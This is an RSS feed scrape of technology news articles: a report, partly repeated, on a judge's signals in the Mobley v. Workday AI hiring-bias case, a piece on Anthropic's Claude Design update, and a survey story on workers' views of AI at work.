<p>This week, US District Judge Rita Lin indicated that she will likely allow additional state discrimination claims against Workday to move forward. This would significantly expand the closely-watched case and likely ratchet up scrutiny of AI recruiting tools and their potentially inherent biases when it comes to age, race, sex, disabilities, and other factors.</p>



<p>Further, it could indicate that, even if a company is not the final employer, it may be held liable if its tools materially influence who gets rejected. This could set new legal standards for AI hiring systems, and have implications across industries, experts note.</p>



<p>“This case reinforces the importance of actually managing AI risks,” said <a href="https://www.infotech.com/profiles/valence-howden" target="_blank" rel="noreferrer noopener">Valence Howden</a>, advisory fellow at Info-Tech Research Group. “If an AI-enabled model or ATS [Applicant Tracking System] is making decisions based on historical information, it can raise questions about whether bias in outcomes and datasets has been properly addressed.”</p>



<h2 class="wp-block-heading">The case so far</h2>



<p><a href="https://www.eeoc.gov/sites/default/files/2024-04/Mobley%20v%20Workday%20NDCal%20am-brf%2004-24%20sjw.pdf" target="_blank" rel="noreferrer noopener">Mobley v. Workday, Inc.</a> alleges that Workday’s AI screening tools discriminate against job seekers based on age, race, and disability. The suit was filed in 2024 in the US District Court of California by Derek Mobley, a Black disabled man over 40, who claimed Workday’s algorithms continually screened him out as he applied for more than 100 positions on the platform.</p>



<p>The claims alleged discrimination prohibited by several US and California statutes: Race and sex under the Civil Rights Act of 1964 (Title VII); disability under the Americans with Disabilities Act of 1990 (ADA); age under the Age Discrimination in Employment Act of 1967 (ADEA); and race, gender, and age under <a href="https://www.dor.ca.gov/Home/FairEmploymentAct" target="_blank" rel="noreferrer noopener">California Fair Employment and Housing Act</a> (FEHA).</p>



<p>Specifically, the suit centered around Workday’s use of automated, algorithm-driven tools for <a href="https://www.computerworld.com/article/4121074/workers-challenge-hidden-ai-hiring-tools-in-class-action-with-major-regulatory-stakes.html" target="_blank">applicant screening</a>. It alleged that these systems rely on historical data and statistical modeling that can make them susceptible to existing biases, even if protected characteristics like race, age, sex, or disability are not explicitly provided.</p>



<p>Bias may enter these systems in different ways, the plaintiffs argued, including via training data, model design, and evaluation criteria for candidate fit. The system could reproduce discriminatory outcomes by making correlations from data. For instance, years of experience on a resumé may indicate age; long employment gaps may infer a disability or caregiving responsibilities; educational and institutional affiliations could reflect race.</p>



<p>Workday has argued that it is not subject to liability under employment statutes because it does not qualify as the job applicants’ “employer.” But federal judges have allowed key parts of the lawsuit to move forward, ruling that Workday could potentially be treated as an employer’s “agent” for the purposes of anti-discrimination law.</p>



<p>The latest dispute centers on FEHA. According to legal sources, the California statute is among the strongest anti-discrimination laws in the US, in many cases providing broader protections than federal employment laws.</p>



<p>Workday asked the court to dismiss claims brought under California law, saying FEHA should not <a href="https://www.computerworld.com/article/4178801/ai-hiring-monoculture-is-delivering-racial-bias-at-scale-2.html" target="_blank">apply to the hiring</a> decisions of out-of-state employers and applicants. The company’s lawyers argued that enforcing this would effectively allow California law to supersede that of other states, just because a company used their platform.</p>



<p>But Lin disagreed, saying FEHA does apply, and in fact, Workday is directly liable for its “own engagement in FEHA-regulated activities on the employer’s behalf.” Holding businesses liable for “their own discriminatory conduct” is within the scope and purposes of FEHA and consistent with public policy.</p>



<p>However, the issue is still to be decided; Lin did not indicate when she would release a final ruling.</p>



<h2 class="wp-block-heading">Workday’s defense</h2>



<p>A Workday spokesperson called the claims in the suit “false.”</p>



<p>“Workday’s AI recruiting tools don’t make hiring decisions and are designed with human oversight at their core,” the spokesperson told CIO. “Our technology looks only at job qualifications, not protected traits like race, age, or disability. We rigorously test our products as part of our responsible AI program to confirm our tools do not harm protected groups.”</p>



<p>Workday’s platform is meant to provide insights on how well a candidate’s qualifications match the requirements of a posted job, the company said. Those tools focus only on qualifications listed in a candidate’s application, which are compared to qualifications identified by the employer as important for the job.</p>



<p>Workday’s Chief Responsible AI Officer <a href="https://blog.workday.com/en-us/authors/kelly-trindel.html" target="_blank" rel="noreferrer noopener">Kelly Trindel</a> said its AI does not make employment decisions, automatically reject candidates, or determine who gets a job; further, she said, there is no evidence that the company’s tools result in harm to protected groups.</p>



<p>Trindel, who is former chief analyst of the Equal Employment Opportunity Commission (EEOC), leads a dedicated team composed of psychologists and PhD-level data scientists whose sole focus is to ensure that its AI is “responsible, fair, and ethical.” She said that the company’s AI systems undergo ongoing reviews throughout their lifecycle to help prevent unintended consequences, and Workday is “committed to accountability, transparency, and trust,” and invests “significant resources” into identifying and mitigating bias.</p>



<p>Further, she said, Workday has a company-wide commitment to ethical AI, and an independently-evaluated AI governance program based on standards from the National Institute of Standards and Technology (NIST) and the International Standards Organization (ISO).</p>



<p>“Workday builds AI to support people, not replace them, and this is of particular importance when it comes to hiring,” Trindel noted. Its platform is designed to help employers “manage high-volume processes more efficiently, surface relevant information, and reduce administrative work so teams can spend more time applying their expertise and judgement to hiring decisions.”</p>



<h2 class="wp-block-heading">What this means for enterprise leaders</h2>



<p>Workday isn’t alone in its legal challenges; other <a href="https://www.computerworld.com/article/4005351/surprise-employers-are-using-ai-to-interview-you.html" target="_blank">AI hiring tools</a> are also being scrutinized over their methodologies, algorithms, and data-collecting practices. Eightfold, for one, is also facing a California class action lawsuit alleging that its tools unfairly rely on job candidates’ online data to predict whether they’d be a good fit for a position.</p>



<p>This means that enterprises, who are already feeling increased pressure to document hiring decisions, conduct AI bias audits, and maintain human oversight in recruitment and hiring, must be even more diligent in their vetting of AI tools.</p>



<p>Organizations must be actively defining how <a href="https://www.computerworld.com/article/4016308/most-managers-now-rely-on-ai-for-hiring-and-firing-study-finds.html" target="_blank">these recruitment tools</a> should work, identifying bias in their algorithms, and setting up structures to test for bias across the tools’ decision-making logic, Info-Tech’s Howden advised.</p>



<p>“Validation of non-biased outcomes also needs to be active and ongoing, rather than a point-in-time exercise,” he said.</p>



<p>While Workday and others say human oversight is paramount, “it’s hard to incorporate humans into the process if the platform does the weeding out before humans have the ability to intervene,” Howden pointed out.</p>



<p>Discriminatory biases can exist in past hiring decisions, so it’s easy to forget that AI can “emulate and adapt those biases as part of its perspective,” he said. That includes how AI looks at language: Different cultures use different phrasing, and AI can capture that and use it to exclude candidates.</p>



<p>Ultimately, he called the case a “cautionary tale” illustrating how lightly some organizations have been treating AI risk. It also highlights the urgency involved in building out more advanced enterprise risk practices, “rather than relying on the limited capabilities they may have employed up until now.”</p>



<p><em>This article originally appeared on <a href="https://www.cio.com/article/4186548/judge-signals-ai-recruitment-tool-vendors-like-workday-may-not-escape-liability-for-discrimination.html" target="_blank">CIO.com</a>.</em></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Judge signals AI recruitment tool vendors like Workday may not escape liability for discrimination]]></title>
<description><![CDATA[A federal judge has rebuffed Workday’s claim that it cannot be held liable under California anti-discrimination laws when its tools are used to screen (and potentially reject) job candidates in other states.



This week, US District Judge Rita Lin indicated that she will likely allow additional ...]]></description>
<link>https://tsecurity.de/de/3606452/it-nachrichten/judge-signals-ai-recruitment-tool-vendors-like-workday-may-not-escape-liability-for-discrimination/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606452/it-nachrichten/judge-signals-ai-recruitment-tool-vendors-like-workday-may-not-escape-liability-for-discrimination/</guid>
<pubDate>Thu, 18 Jun 2026 03:17:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A federal judge has rebuffed Workday’s claim that it cannot be held liable under California anti-discrimination laws when its tools are used to screen (and potentially reject) job candidates in other states.</p>



<p>This week, US District Judge Rita Lin indicated that she will likely allow additional state discrimination claims against Workday to move forward. This would significantly expand the closely-watched case and likely ratchet up scrutiny of AI recruiting tools and their potentially inherent biases when it comes to age, race, sex, disabilities, and other factors.</p>



<p>Further, it could indicate that, even if a company is not the final employer, it may be held liable if its tools materially influence who gets rejected. This could set new legal standards for AI hiring systems, and have implications across industries, experts note.</p>



<p>“This case reinforces the importance of actually managing AI risks,” said <a href="https://www.infotech.com/profiles/valence-howden" target="_blank" rel="nofollow">Valence Howden</a>, advisory fellow at Info-Tech Research Group. “If an AI-enabled model or ATS [Applicant Tracking System] is making decisions based on historical information, it can raise questions about whether bias in outcomes and datasets has been properly addressed.”</p>



<h2 class="wp-block-heading">The case so far</h2>



<p><a href="https://www.eeoc.gov/sites/default/files/2024-04/Mobley%20v%20Workday%20NDCal%20am-brf%2004-24%20sjw.pdf" target="_blank" rel="nofollow">Mobley v. Workday, Inc.</a> alleges that Workday’s AI screening tools discriminate against job seekers based on age, race, and disability. The suit was filed in 2024 in the US District Court of California by Derek Mobley, a Black disabled man over 40, who claimed Workday’s algorithms continually screened him out as he applied for more than 100 positions on the platform.</p>



<p>The claims alleged discrimination prohibited by several US and California statutes: Race and sex under the Civil Rights Act of 1964 (Title VII); disability under the Americans with Disabilities Act of 1990 (ADA); age under the Age Discrimination in Employment Act of 1967 (ADEA); and race, gender, and age under <a href="https://www.dor.ca.gov/Home/FairEmploymentAct" target="_blank" rel="nofollow">California Fair Employment and Housing Act</a> (FEHA).</p>



<p>Specifically, the suit centered around Workday’s use of automated, algorithm-driven tools for <a href="https://www.computerworld.com/article/4121074/workers-challenge-hidden-ai-hiring-tools-in-class-action-with-major-regulatory-stakes.html" target="_blank">applicant screening</a>. It alleged that these systems rely on historical data and statistical modeling that can make them susceptible to existing biases, even if protected characteristics like race, age, sex, or disability are not explicitly provided.</p>



<p>Bias may enter these systems in different ways, the plaintiffs argued, including via training data, model design, and evaluation criteria for candidate fit. The system could reproduce discriminatory outcomes by making correlations from data. For instance, years of experience on a resumé may indicate age; long employment gaps may infer a disability or caregiving responsibilities; educational and institutional affiliations could reflect race.</p>



<p>Workday has argued that it is not subject to liability under employment statutes because it does not qualify as the job applicants’ “employer.” But federal judges have allowed key parts of the lawsuit to move forward, ruling that Workday could potentially be treated as an employer’s “agent” for the purposes of anti-discrimination law.</p>



<p>The latest dispute centers on FEHA. According to legal sources, the California statute is among the strongest anti-discrimination laws in the US, in many cases providing broader protections than federal employment laws.</p>



<p>Workday asked the court to dismiss claims brought under California law, saying FEHA should not <a href="https://www.computerworld.com/article/4178801/ai-hiring-monoculture-is-delivering-racial-bias-at-scale-2.html" target="_blank">apply to the hiring</a> decisions of out-of-state employers and applicants. The company’s lawyers argued that enforcing this would effectively allow California law to supersede that of other states, just because a company used their platform.</p>



<p>But Lin disagreed, saying FEHA does apply, and in fact, Workday is directly liable for its “own engagement in FEHA-regulated activities on the employer’s behalf.” Holding businesses liable for “their own discriminatory conduct” is within the scope and purposes of FEHA and consistent with public policy.</p>



<p>However, the issue is still to be decided; Lin did not indicate when she would release a final ruling.</p>



<h2 class="wp-block-heading">Workday’s defense</h2>



<p>A Workday spokesperson called the claims in the suit “false.”</p>



<p>“Workday’s AI recruiting tools don’t make hiring decisions and are designed with human oversight at their core,” the spokesperson told CIO. “Our technology looks only at job qualifications, not protected traits like race, age, or disability. We rigorously test our products as part of our responsible AI program to confirm our tools do not harm protected groups.”</p>



<p>Workday’s platform is meant to provide insights on how well a candidate’s qualifications match the requirements of a posted job, the company said. Those tools focus only on qualifications listed in a candidate’s application, which are compared to qualifications identified by the employer as important for the job.</p>



<p>Workday’s Chief Responsible AI Officer <a href="https://blog.workday.com/en-us/authors/kelly-trindel.html" target="_blank" rel="nofollow">Kelly Trindel</a> said its AI does not make employment decisions, automatically reject candidates, or determine who gets a job; further, she said, there is no evidence that the company’s tools result in harm to protected groups.</p>



<p>Trindel, who is former chief analyst of the Equal Employment Opportunity Commission (EEOC), leads a dedicated team composed of psychologists and PhD-level data scientists whose sole focus is to ensure that its AI is “responsible, fair, and ethical.” She said that the company’s AI systems undergo ongoing reviews throughout their lifecycle to help prevent unintended consequences, and Workday is “committed to accountability, transparency, and trust,” and invests “significant resources” into identifying and mitigating bias.</p>



<p>Further, she said, Workday has a company-wide commitment to ethical AI, and an independently-evaluated AI governance program based on standards from the National Institute of Standards and Technology (NIST) and the International Standards Organization (ISO).</p>



<p>“Workday builds AI to support people, not replace them, and this is of particular importance when it comes to hiring,” Trindel noted. Its platform is designed to help employers “manage high-volume processes more efficiently, surface relevant information, and reduce administrative work so teams can spend more time applying their expertise and judgement to hiring decisions.”</p>



<h2 class="wp-block-heading">What this means for enterprise leaders</h2>



<p>Workday isn’t alone in its legal challenges; other <a href="https://www.computerworld.com/article/4005351/surprise-employers-are-using-ai-to-interview-you.html" target="_blank">AI hiring tools</a> are also being scrutinized over their methodologies, algorithms, and data-collecting practices. Eightfold, for one, is also facing a California class action lawsuit alleging that its tools unfairly rely on job candidates’ online data to predict whether they’d be a good fit for a position.</p>



<p>This means that enterprises, who are already feeling increased pressure to document hiring decisions, conduct AI bias audits, and maintain human oversight in recruitment and hiring, must be even more diligent in their vetting of AI tools.</p>



<p>Organizations must be actively defining how <a href="https://www.computerworld.com/article/4016308/most-managers-now-rely-on-ai-for-hiring-and-firing-study-finds.html" target="_blank">these recruitment tools</a> should work, identifying bias in their algorithms, and setting up structures to test for bias across the tools’ decision-making logic, Info-Tech’s Howden advised.</p>



<p>“Validation of non-biased outcomes also needs to be active and ongoing, rather than a point-in-time exercise,” he said.</p>



<p>While Workday and others say human oversight is paramount, “it’s hard to incorporate humans into the process if the platform does the weeding out before humans have the ability to intervene,” Howden pointed out.</p>



<p>Discriminatory biases can exist in past hiring decisions, so it’s easy to forget that AI can “emulate and adapt those biases as part of its perspective,” he said. That includes how AI looks at language: Different cultures use different phrasing, and AI can capture that and use it to exclude candidates.</p>



<p>Ultimately, he called the case a “cautionary tale” illustrating how lightly some organizations have been treating AI risk. It also highlights the urgency involved in building out more advanced enterprise risk practices, “rather than relying on the limited capabilities they may have employed up until now.”</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic ships major Claude Design overhaul with design system imports, code round-trips, and a fix for its token-burning problem]]></title>
<description><![CDATA[When Anthropic quietly released Claude Design in April as a "research preview," it generated the kind of instant traction most product teams dream about: more than one million users in its first week. It also generated a problem. The tool consumed tokens so voraciously that a PCWorld reviewer bur...]]></description>
<link>https://tsecurity.de/de/3605936/it-nachrichten/anthropic-ships-major-claude-design-overhaul-with-design-system-imports-code-round-trips-and-a-fix-for-its-token-burning-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605936/it-nachrichten/anthropic-ships-major-claude-design-overhaul-with-design-system-imports-code-round-trips-and-a-fix-for-its-token-burning-problem/</guid>
<pubDate>Wed, 17 Jun 2026 21:31:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When <a href="https://www.anthropic.com/">Anthropic</a> quietly released <a href="https://claude.ai/design">Claude Design</a> in April as a "<a href="https://www.anthropic.com/news/claude-design-anthropic-labs">research preview</a>," it generated the kind of instant traction most product teams dream about: more than one million users in its first week. It also generated a problem. The tool consumed tokens so voraciously that a PCWorld reviewer <a href="https://www.pcworld.com/article/3117811/i-tried-claude-design-for-half-an-hour-im-already-locked-out-for-a-week.html">burned through 80 percent</a> of his weekly Claude Pro allowance in roughly 25 minutes, producing just three variations of a single webpage prototype. "We're talking another token-hungry Claude product here," the reviewer wrote, "one that Pro users in particular will barely be able to use before burning through their usage limits."</p><p>Two months later, Anthropic is shipping a substantially overhauled version of <a href="https://claude.ai/design">Claude Design</a> that attempts to fix the consumption issue while simultaneously repositioning the product from a flashy demo into something far more strategically important: a design system compliance layer that connects to code, connects to the tools enterprises already use, and — critically — keeps everything on brand.</p><p>The update, announced Wednesday, arrives at a moment when Anthropic is executing one of the most aggressive product expansions in the AI industry's brief history. In the past ten weeks alone, the company has launched <a href="https://www.anthropic.com/news/claude-opus-4-8">Claude Opus 4.8</a>, released (and then suspended) the Mythos-class <a href="https://www.anthropic.com/news/claude-fable-5-mythos-5">Fable 5 model</a>, shipped ten agent templates for financial services, announced a <a href="https://investors.dxc.com/investor-news/news-details/2026/DXC-and-Anthropic-Announce-Multi-Year-Global-Alliance-to-Bring-AI-into-Mission-Critical-Enterprise-Systems/default.aspx">multi-year alliance</a> with DXC Technology to embed Claude inside the IT infrastructure of the world's largest banks and airlines, rolled out <a href="https://www.anthropic.com/news/claude-for-small-business">Claude for Small Business</a> with integrations into QuickBooks and PayPal, and published research showing that Claude Code users now average <a href="https://www.anthropic.com/research/claude-code-expertise?lang=us">20 hours per week on the tool</a>. </p><p>Claude Design's transformation from prototype toy to enterprise platform is the latest move in a company-wide strategy to make Claude not just an assistant people talk to, but a worker embedded in the systems where work actually happens.</p><h2><b>How design system imports make Claude Design an enterprise brand-compliance tool</b></h2><p>The headline feature in Wednesday's update is not the new drag-and-resize editor, nor the expanded list of export destinations, though both matter. The feature that signals where Anthropic is heading is the rebuilt design system import.</p><p>Users can now bring one or several design systems into Claude Design from a <a href="https://github.com/">GitHub</a> repository, design files, or raw uploads. Once imported, Claude builds with those components, checks its output against the design system, and auto-corrects before the user ever sees the result. For larger organizations, a new admin role can approve a single standard system and lock down edits, ensuring that every asset Claude produces conforms to company guidelines.</p><p>This is a meaningful departure from the tool's original positioning. In April, <a href="https://claude.ai/design">Claude Design</a> was a blank canvas: give it a prompt, and it would generate something visually impressive but stylistically arbitrary. Business Insider tested it against Canva AI for a photography workshop slide deck and found that Claude Design "<a href="https://www.businessinsider.com/claude-design-canva-ai-test-compare-create-presentation-saas-2026-5">anticipated my needs</a>" and "identified its own errors and corrected them without prompting." But the output reflected Claude's aesthetic judgment, not the user's brand. For an individual freelancer or a startup founder sketching ideas, that was fine. For a 10,000-person enterprise with a 200-page brand standards document, it was a non-starter.</p><p>The design system import changes that equation. By ingesting a company's actual components — its buttons, typography, color tokens, spacing rules — and then validating output against them before surfacing results, Claude Design is attempting something that most human designers struggle with: consistent brand compliance at speed and scale. The admin lockdown feature, which prevents individual users from overriding the approved system, is a direct play for the enterprise procurement conversation, where "can we control what it produces?" is often the first question.</p><h2><b>Why the Claude Code round-trip could end the design-to-engineering handoff problem</b></h2><p>The second major update is the bidirectional integration between <a href="https://claude.ai/design">Claude Design</a> and <a href="https://www.anthropic.com/product/claude-code">Claude Code</a>. Users can now run /design-sync in Claude Code to import their local codebase's design system into Claude Design, ensuring that prototypes start from real components rather than approximations. When a design is ready to ship, it hands off to Claude Code, which picks up exactly where the designer left off — no screenshot, no rebuild. The integration works in reverse, too. From a Claude Code terminal, the /design command lets developers create, edit, and sync design projects without leaving their workflow.</p><p>This matters because the handoff between design and engineering has been one of the most persistent friction points in software development for decades. Tools like Figma's Dev Mode and Zeplin have tried to bridge the gap by generating specifications and code snippets from design files, but the translation has always been lossy. A designer's prototype and an engineer's implementation inevitably diverge, creating a cycle of visual QA, redlines, and "that's not what the mockup looked like" conversations.</p><p>Anthropic is betting that if the same AI system both designs and codes — and if both modes share the same underlying component library — the gap disappears. It is, in effect, arguing that the design-to-code problem was never really about better specification formats or smarter handoff tools. It was about the fact that two different humans (or two different tools) were interpreting the same intent. A single AI system that operates on both sides of the workflow doesn't need to interpret; it just continues.</p><p>The timing of this integration is also significant in light of Anthropic's own research. Just yesterday, the company published an analysis of <a href="https://www.anthropic.com/research/claude-code-expertise">roughly 400,000 Claude Code sessions </a>showing that domain expertise — not coding proficiency — is the primary driver of successful outcomes. Every major occupation succeeded at coding tasks at nearly the same rate as software engineers. If designers can now move fluidly between visual prototyping and code implementation through a single AI system, the research suggests they will succeed not because they learned to code, but because they deeply understand the design problems they are solving.</p><h2><b>Token consumption gets a fix, but the economics of generative design remain tight</b></h2><p>The token consumption issue that dogged Claude Design's launch was not just a user experience annoyance — it was a structural threat to the product's viability. If a <a href="https://support.claude.com/en/articles/11049762-choose-a-claude-plan">$20-per-month Pro subscriber</a> could exhaust their entire weekly allowance in a single 30-minute session, the tool was effectively inaccessible to the individual users and small teams who drove its initial viral adoption.</p><p>Anthropic's response is twofold. First, <a href="https://claude.ai/design">Claude Design</a> now shares usage limits with chat, <a href="https://www.anthropic.com/product/claude-cowork">Claude Cowork</a>, and <a href="https://www.anthropic.com/product/claude-code">Claude Code</a>, rather than drawing from a separate, smaller pool. This gives most users significantly more headroom. Second, the company says it has reduced the average token consumption per turn while maintaining output quality, and that error rates have dropped sharply.</p><p>Whether this is enough remains an open question. The fundamental tension is architectural: generative design is inherently token-expensive. Every variation Claude produces requires the model to reason about layout, typography, color, spacing, responsiveness, and content simultaneously, then generate a complete, functional artifact. That is a fundamentally different workload than answering a question in chat, and it consumes tokens accordingly. Anthropic's efficiency improvements may push the breaking point further out, but they do not eliminate the underlying economics. For enterprise customers on Team and Enterprise plans with higher limits, this may be a non-issue. For Pro subscribers, the math is still likely to be tight.</p><p>The new editor helps mitigate this somewhat by giving users direct control over individual elements — drag, resize, and align — without burning a model turn for every small adjustment. Hundreds of stability fixes also mean fewer wasted turns on errors and regenerations, which were a significant source of token drain in the original release. These are not glamorous improvements, but they are the kind of grind work that separates a research preview from a daily-use tool.</p><h2><b>Nine new export partners position Claude Design as a creative hub, not a destination</b></h2><p>The update's third pillar is an expanded set of export destinations. Claude Design now sends work to <a href="https://www.adobe.com/">Adobe</a>, <a href="https://base44.com/">Base44</a>, <a href="https://www.canva.com/">Canva</a>, <a href="https://gamma.app/">Gamma</a>, <a href="https://lovable.dev/">Lovable</a>, <a href="https://miro.com/">Miro</a>, <a href="https://replit.com/">Replit</a>, <a href="https://vercel.com/">Vercel</a>, and <a href="https://www.wix.com/">Wix</a>, in addition to PDF and PowerPoint. The breadth of this list reveals a deliberate positioning strategy: Anthropic is building Claude Design not as a place where work is finished, but as the place where it begins.</p><p>The partner quotes tell the story. Replit's president Michele Catasta frames the integration as meeting "builders wherever ideas begin." Canva's Anwar Haneef describes the flow from Claude Design as turning "a first draft" into "a finished asset — kept on-brand, personalized for the moment." Vercel's Andrew Qu talks about pushing a concept "straight to Vercel to ship." In each case, Claude Design is the origin point, and the partner tool is where polish, collaboration, and deployment happen.</p><p>This hub-and-spoke model also serves as a defensive moat against the open-source alternative that has emerged with surprising speed. <a href="https://github.com/nexu-io/open-design">Open Design</a>, a community-built project tracked by <a href="https://www.augmentcode.com/learn/open-design-claude-design-alternative">Augment Code</a>, reached 57,400 GitHub stars and 310 contributors in just eight weeks after Claude Design's launch. It offers local-first operation, model flexibility supporting 16 different coding agents, and 259 skills with 142 design systems — all without cloud lock-in. Augment Code's Paula Hingel noted that for "teams that need to self-host, use their own API keys, or swap models, Open Design is currently the only local-first option with this level of skill and design system coverage."</p><p>Anthropic's answer to this competitive pressure is not to match <a href="https://www.augmentcode.com/learn/open-design-claude-design-alternative">Open Design</a> on self-hosting or model flexibility — those are philosophical concessions the company is unlikely to make. Instead, it is building an integration ecosystem that open-source projects cannot easily replicate. A native Adobe Express connector, a verified Canva export pipeline, a first-party Vercel deployment path — these are partnerships, not features, and they require business relationships that community projects cannot forge at the same pace.</p><h2><b>Claude Design fits into Anthropic's broader push to embed AI across the entire enterprise stack</b></h2><p>To understand why Claude Design's evolution matters, it helps to zoom out. Anthropic is building a product surface that now spans creative work (<a href="https://claude.ai/design">Design</a>), code (<a href="https://www.anthropic.com/product/claude-code">Code</a>), knowledge work (<a href="https://www.anthropic.com/product/claude-cowork">Cowork</a>), and enterprise operations (<a href="https://platform.claude.com/docs/en/managed-agents/overview">Managed Agents</a>) — all unified by the same underlying models and, increasingly, by shared context that carries across tools.</p><p>The trajectory of the past quarter makes the pattern unmistakable. In May, Anthropic launched Claude for Small Business with connectors to QuickBooks, PayPal, and HubSpot, putting Claude inside the tools that small business owners already use for payroll, invoicing, and marketing. The same month, the company released ten agent templates for financial services covering everything from pitchbook creation to KYC screening, with connectors to FactSet, S&amp;P Capital IQ, and Morningstar. Claude Opus 4.8 shipped on May 28 with a "dynamic workflows" feature enabling hundreds of parallel sub-agents in a single Claude Code session. Then came the Fable 5 and Mythos 5 launch on June 9, followed almost immediately by a US government export control directive that suspended access to both. DXC Technology announced a multi-year alliance to train tens of thousands of Claude-certified engineers to embed Claude inside the systems it operates for major banks, airlines, and insurers.</p><p>The design system you import into Claude Design is the same component library that Claude Code uses to implement. The financial model you build in Claude for Excel can flow into a pitchbook created in Claude Design and exported to PowerPoint. The brand assets a small business owner creates through Claude Design can be pushed directly to Canva for team collaboration. This is not a chatbot strategy. It is a platform strategy, and the Claude Design update — with its design system imports, code round-trips, and export ecosystem — is one of the clearest expressions of it yet.</p><p>Anthropic also published an engineering deep-dive last month detailing how it contains Claude across products using sandboxes, virtual machines, and egress controls — infrastructure that becomes more critical as tools like Claude Design gain access to proprietary design systems and brand assets. The containment architecture reveals both the ambition and the risk: the more deeply Claude embeds into enterprise workflows, the higher the stakes when something goes wrong, and the more sophisticated the security envelope must become.</p><p>Three questions will determine whether Wednesday's update delivers on its ambitions. First, whether the token economics actually work for the broadest user base — shared limits and efficiency gains help, but generative design remains expensive. Second, whether the design system import proves robust enough for real enterprise use, because ingesting a GitHub repository of React components and faithfully using them across dozens of design variations is a genuinely hard technical problem. And third, whether the Claude Code round-trip actually eliminates the design-engineering gap or merely shifts it.</p><p>Claude Design launched two months ago as a thing people tried once and marveled at. Anthropic is now trying to make it a thing people use every day — and more than that, a thing their entire team trusts to stay on brand while they do. In the AI industry, the distance between a viral demo and an indispensable tool has swallowed more products than it has produced. Anthropic just bet that design systems, not just design prompts, are the bridge across.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[63% of workers see AI making the workplace ‘less human’]]></title>
<description><![CDATA[IT and business leaders are full steam ahead on AI, with an eye toward improving efficiency and productivity. Employees, however, foresee AI use impacting workplace culture, as 63% say it will “make the workplace feel less human” and 57% say AI will reduce human skills, according to the AI and Wo...]]></description>
<link>https://tsecurity.de/de/3604248/it-security-nachrichten/63-of-workers-see-ai-making-the-workplace-less-human/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604248/it-security-nachrichten/63-of-workers-see-ai-making-the-workplace-less-human/</guid>
<pubDate>Wed, 17 Jun 2026 11:36:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>IT and business leaders are full steam ahead on AI, with an eye toward improving efficiency and productivity. Employees, however, foresee AI use impacting workplace culture, as 63% say it will “make the workplace feel less human” and 57% say AI will reduce human skills, according to the <a href="https://www.resume-now.com/job-resources/careers/ai-workplace-humanity" rel="nofollow">AI and Workplace Humanity Report</a> from Resume Now.</p>



<p>Workers also believe the implementation of AI will devalue human work (43%), rendering the workplace a “cold, machine-driven environment” (20%) — only 16% say AI will make the workplace more human. Concerns around AI’s impact on <a href="https://www.cio.com/article/3841632/with-critical-thinking-in-decline-it-must-rethink-application-usability.html">critical thinking skills</a> and human connection are growing, and its fast adoption is pushing employees to question exactly how AI will be implemented moving forward. Leaders will need to take workplace culture into consideration with any AI strategy to address these concerns.</p>



<p>“Leaders must be clear and transparent with their AI strategy and principles. And employee voice can be a critical input to that strategy,” says Kaelyn Lowmaster, director analyst of the Gartner HR Practice. “Create channels for employees to surface concerns, ask questions, and suggest AI use cases. Especially as AI-native employees enter the workforce, employees can be a valuable source of information about how to use emerging tools well — and what to avoid.”</p>



<h2 class="wp-block-heading">Reinforce workplace culture to ease AI fears</h2>



<p>Leaders looking to implement AI will need to maintain open lines of communication and transparency around AI and its impact to help get employees on board, even enthusiastic, about AI.</p>



<p>“Dedicated mentorship time, team-based projects, and in-person or hybrid touchpoints can help bring people together. These efforts help strengthen collaboration and sense of connection, so the focus stays on people, not just the technology,” says Megan Slabinski, district president of technology talent solutions at Robert Half.</p>



<p>It’s important to communicate the organization’s goals for AI and to have a clear strategy in place for its implementation. Employees will need reassurance that they have job security and that they won’t be laid off or made redundant in the place of AI. There’s a lot of conflicting news and chatter about AI and its impact on jobs across every industry, so you’ll need to take this into consideration when rolling out any new AI strategy.</p>



<p>“No organization can fully predict the future, but they can provide clarity on employees’ current value and share plans for how their roles will change in the near- to mid-term. Gartner research shows that degree of clarity, more than any other form of support an organization can provide, drives employees to use AI,” says Lowmaster.</p>



<h2 class="wp-block-heading">Curbing potential culture problems stemming from AI</h2>



<p>IT leaders should also build narratives around the positives of AI, sharing how it can boost productivity, while emphasizing the continuing need for human oversight.</p>



<p>“AI is accelerating how organizations process information, automate tasks, and make decisions faster. What it is not doing is replacing the need for human judgment, oversight, and accountability. AI may complete 80% or 90% of a workflow, but the final layer still requires people to validate outcomes, make decisions, and assume responsibility,” says Frank Antezana, CEO of iTech AG.</p>



<p>Employees have growing concerns about <a href="https://www.cio.com/article/4185908/Workers%20express%20growing%20concerns%20around%20AI%E2%80%99s%20impact%20on%20critical%20thinking%20skills%20and%20human%20connection%20%E2%80%93%20its%20fast%20adoption%20is%20pushing%20employees%20to%20question%20exactly%20how%20AI%20will%20be%20implemented%20moving%20forward%20in%20their%20daily%20lives.">AI workslop</a>, the result of undertrained employees using AI to create low-quality outputs that must then be edited or reworked by coworkers. AI is also infamous for making egregious errors at times, requiring human intervention to correct or render effective.</p>



<p>Leaders will need to identify where AI might impact human collaboration as well, trying not to replace the need for interoffice communication, Lowmaster says. For example, if employees are overly reliant on AI to “brainstorm and review their work,” there’s a chance they’ll collaborate less with coworkers on those tasks, she adds. Moreover, if AI “boosts individual employees’ efficiency,” they might start feeling “unsustainable pressure to hit elevated, AI-driven targets for speed or output.”</p>



